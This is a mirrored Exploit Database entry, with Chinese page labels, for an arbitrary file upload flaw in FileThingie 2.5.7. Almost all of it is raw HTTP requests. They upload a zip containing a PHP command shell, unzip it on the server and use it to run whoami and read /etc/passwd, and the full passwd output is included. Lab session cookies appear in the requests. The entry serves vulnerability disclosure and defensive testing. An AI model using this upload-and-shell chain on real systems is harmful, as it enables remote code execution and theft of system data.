FileThingie 2.5.7 – Arbitrary File Upload

• Exploit Database
• 131 阅读

• 作者： cakes
  日期： 2019-09-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/47349/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154

  # Exploit Title: FileThingie 2.5.7 - Arbitrary File Upload # Author: Cakes # Discovery Date: 2019-09-03 # Vendor Homepage: www.solitude.dk/filethingie # Software Link: https://github.com/leefish/filethingie/archive/master.zip # Tested Version: 2.5.7 # Tested on OS: CentOS 7 # CVE: N/A   # Intro: # Easy arbitrary file upload vulnerability allows an attacker to upload malicious .zip archives   ::::: POST .zip file with cmd shell   POST /filethingy/ft2.php HTTP/1.1 Host: 10.0.0.21 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.0.0.21/filethingy/ft2.php?dir=/tester Content-Type: multipart/form-data; boundary=---------------------------3402520321248020588131184034 Content-Length: 1117 Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7 Connection: close Upgrade-Insecure-Requests: 1 DNT: 1   -----------------------------3402520321248020588131184034 Content-Disposition: form-data; name="localfile-1567531192592"; filename="" Content-Type: application/octet-stream     -----------------------------3402520321248020588131184034 Content-Disposition: form-data; name="MAX_FILE_SIZE"   2000000 -----------------------------3402520321248020588131184034 Content-Disposition: form-data; name="localfile"; filename="cmdshell.zip" Content-Type: application/zip   PK   š#O$  cmdshell.phpUT ۟n]۟n]۟n]ux ³±/È(P(ÃŽHÍɉO­HMÖP‰ww ‰VOÃŽMQÕ´VP°·ã PKý(tÃ…& $ PK    š#Oý(tÃ…& $  ¤cmdshell.phpUT ۟n]۟n]۟n]ux PK Z € -----------------------------3402520321248020588131184034 Content-Disposition: form-data; name="act"   upload -----------------------------3402520321248020588131184034 Content-Disposition: form-data; name="dir"   /tester -----------------------------3402520321248020588131184034 Content-Disposition: form-data; name="submit"   Upload -----------------------------3402520321248020588131184034--           :::::::::::::::::::::::::::::UnzipMalicious file   POST /filethingy/ft2.php HTTP/1.1 Host: 10.0.0.21 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.0.0.21/filethingy/ft2.php?dir=/tester Content-Type: application/x-www-form-urlencoded Content-Length: 63 Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7 Connection: close Upgrade-Insecure-Requests: 1 DNT: 1   newvalue=cmdshell.zip&file=cmdshell.zip&dir=%2Ftester&act=unzip       ::::::::::::::::::::::::::::::Access your shell   GET /filethingy/folders/tester/cmdshell.php?cmd=whoami HTTP/1.1 Host: 10.0.0.21 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7 Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 Cache-Control: max-age=0     ::::::::::::::::::::::::::::::Read /etc/passwd   GET /filethingy/folders/tester/cmdshell.php?cmd=cat%20/etc/passwd HTTP/1.1 Host: 10.0.0.21 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7 Connection: close Upgrade-Insecure-Requests: 1 DNT: 1   HTTP/1.1 200 OK Date: Tue, 03 Sep 2019 17:38:04 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Length: 1738 Connection: close Content-Type: text/html; charset=UTF-8   root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin misdn:x:31:31:Modular ISDN:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin polkitd:x:999:998:User for polkitd:/:/sbin/nologin cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/sbin/nologin mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin saslauth:x:998:76:Saslauthd user:/run/saslauthd:/sbin/nologin mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin uucp:x:10:14:Uucp user:/var/spool/uucp:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin dhcpd:x:177:177:DHCP server:/:/sbin/nologin asterisk:x:997:994:Asterisk PBX:/var/lib/asterisk:/bin/bash spamfilter:x:1000:1000::/home/spamfilter:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin chrony:x:996:993::/var/lib/chrony:/sbin/nologin cakes:x:1001:1001:cakes:/home/cakes:/bin/bash